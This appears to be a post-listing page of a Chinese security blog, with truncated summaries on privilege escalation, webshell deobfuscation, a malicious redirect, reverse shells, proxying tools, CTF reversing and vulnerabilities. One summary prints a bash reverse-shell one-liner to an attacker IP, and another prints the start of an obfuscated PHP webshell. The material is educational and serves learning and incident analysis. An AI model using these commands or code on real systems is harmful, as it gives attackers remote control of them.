上一页 1 2 3 4 5 6 ··· 9 下一页
摘要: #Linux提权 为线下AWD准备 主要包括的方式:利用脏牛提权、利用Searchsploit内核漏洞EXP提权、利用SUID+低版本Nmap交互提权。其他利用方式后续补充。 ##信息收集 uname -a //获取内核版本信息 cat /etc/issue //查看发行版 cat /etc/*-r 阅读全文
posted @ 2020-09-22 18:30 歇马 阅读(322) 评论(0) 推荐(0) 编辑
摘要: 昨天发现了网站被传了三个webshell,尝试解一下其中一个: #orginal: <?php // Silence is golden. function _qErd($_vD2WjKueM) { $_vD2WjKueM=substr($_vD2WjKueM,(int)(hex2bin('3131 阅读全文
posted @ 2020-09-11 16:10 歇马 阅读(1129) 评论(0) 推荐(0) 编辑
摘要: #背景 一个wordpress站点 访问主站后跳转至其他恶意域名 抓包看了一下 利用的是302跳转 而不是直接转向其他站 跳转的域名如下 bestprize-places-here1.life bestanimegame.com auteartumn10.live location.lowerbef 阅读全文
posted @ 2020-09-10 13:21 歇马 阅读(658) 评论(0) 推荐(0) 编辑
摘要: 一个.c文件到可执行文件进行了哪几步? 1.编译 由源代码变成汇编代码 2.汇编 汇编代码变成目标文件(机器指令) 3.链接 将多个目标文件、库文件合并,生成可执行文件 库文件有静态动态两种,静态库文件为.a、动态库为.so文件。静态库中的代码和数据会完整拷贝到可执行程序中,动态库需要在程序运行时以 阅读全文
posted @ 2020-08-10 00:15 歇马 阅读(141) 评论(0) 推荐(0) 编辑
摘要: #反弹shell命令解析 攻击者在机器上监听相应端口,在受害者机器执行反弹shell命令,然后get shell。 bash -i >&/dev/tcp/192.168.190.138/6666 0>&1 ##bash -i 启动一个交互式shell 交互式shell的意思就是跟用户交互,你输入一行 阅读全文
posted @ 2020-07-27 11:23 歇马 阅读(122) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-07-24 14:32 歇马 阅读(0) 评论(0) 推荐(0) 编辑
摘要: #Regeorg+Proifier 参考链接https://www.freebuf.com/articles/network/208221.html Windows reGeorg+proxifier 正向代理 环境 攻击端(Win10):192.168.223.1 靶机一(Win2008):外网I 阅读全文
posted @ 2020-07-13 09:51 歇马 阅读(1970) 评论(0) 推荐(0) 编辑
摘要: #端口 首先要理解端口(port)的概念。端口是一种抽象的软件结构,包括一些数据结构和I/O缓冲。 进程通过系统调用与端口建立连接(binding),之后传输层传给该端口的数据都被相应进程所接收,而相应进程发给传输层的数据也通过该端口。端口操作类似于一般的I/O操作,进程获取一个端口,相当于获取本地 阅读全文
posted @ 2020-07-07 15:55 歇马 阅读(529) 评论(0) 推荐(0) 编辑
摘要: #Reverse IDA使用指令 链接 ##内涵 0707 直接拖进IDA看到疑似flag,按A可以转中文 A ASCII解析成ASCII ##[BJDCTF 2nd]guessgame 拖进IDA 发现flag ##xor 拖进IDA int __cdecl main(int argc, cons 阅读全文
posted @ 2020-07-07 11:26 歇马 阅读(287) 评论(0) 推荐(0) 编辑
摘要: #从ICMP协议开始 参考链接 https://www.cnblogs.com/bjlhx/p/10985384.html 一个新搭建好的网络,往往需要先进行一个简单的测试,来验证网络是否畅通;但是IP协议并不提供可靠传输。如果丢包了,IP协议并不能通知传输层是否丢包以及丢包的原因。 所以我们就需要 阅读全文
posted @ 2020-07-03 10:02 歇马 阅读(733) 评论(0) 推荐(0) 编辑
摘要: #从IP协议安全开始 ##IP数据包 IP协议 IP包在网络层 不保证可靠性 数据包可能重复、丢失,是无连接协议 首先要看TCP/IP协议,涉及到四层:链路层,网络层,传输层,应用层。 其中以太网(Ethernet)的数据帧在链路层 Frame是链路层的基本单元,包含链路层的头部信息(mac地址)和 阅读全文
posted @ 2020-07-02 14:43 歇马 阅读(807) 评论(0) 推荐(0) 编辑
摘要: #关于Ripple20 国外安全研究人员在由Treck开发的TCP/IP协议栈中发现了多个漏洞,这一系列漏洞统称为Ripple20。这些漏洞广泛存在于嵌入式和物联网设备中,影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等),涉及了众多供应商(包括HP、Schneider Ele 阅读全文
posted @ 2020-07-01 09:12 歇马 阅读(180) 评论(0) 推荐(0) 编辑
摘要: 起因是随手点了一个Suricata规则。。 #漏洞描述 北京时间1月15日微软发布CVE-2020-0601漏洞公告,修补了一个Windows加密库中的关键漏洞,为Windows CryptoAPI欺骗漏洞。攻击者可利用此漏洞对恶意程序签名,从而可能骗过操作系统或安全软件的安全机制。 在CVE-20 阅读全文
posted @ 2020-06-30 13:33 歇马 阅读(788) 评论(0) 推荐(0) 编辑
摘要: #wfuzz是什么 web fuzz工具 ##参数 -w 指定字典 FUZZ指要进行fuzz的位置 wfuzz -w 字典 Target/FUZZ -z list 自定义一个字典列表 -X 指定HTTP请求方法类型 wfuzz -z list,"GET-POST-HEAD-PUT" -X FUZZ 阅读全文
posted @ 2020-06-24 14:37 歇马 阅读(627) 评论(0) 推荐(0) 编辑
摘要: OS:Ubuntu 14.04 尝试更新 sudo apt-get update sudo apt-get upgrade 更新之后 没有用 阅读全文
posted @ 2020-06-23 13:54 歇马 阅读(231) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 9 下一页